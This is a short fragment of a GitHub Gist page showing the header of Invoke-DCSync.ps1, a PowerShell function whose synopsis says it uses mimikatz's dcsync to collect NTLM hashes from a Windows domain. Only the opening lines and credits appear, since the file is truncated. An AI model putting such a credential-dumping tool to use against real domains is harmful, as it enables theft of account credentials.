Skip to content

Instantly share code, notes, and snippets.

@daniel0x00
daniel0x00 / Invoke-DCSync.ps1
Created May 2, 2016 17:54 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y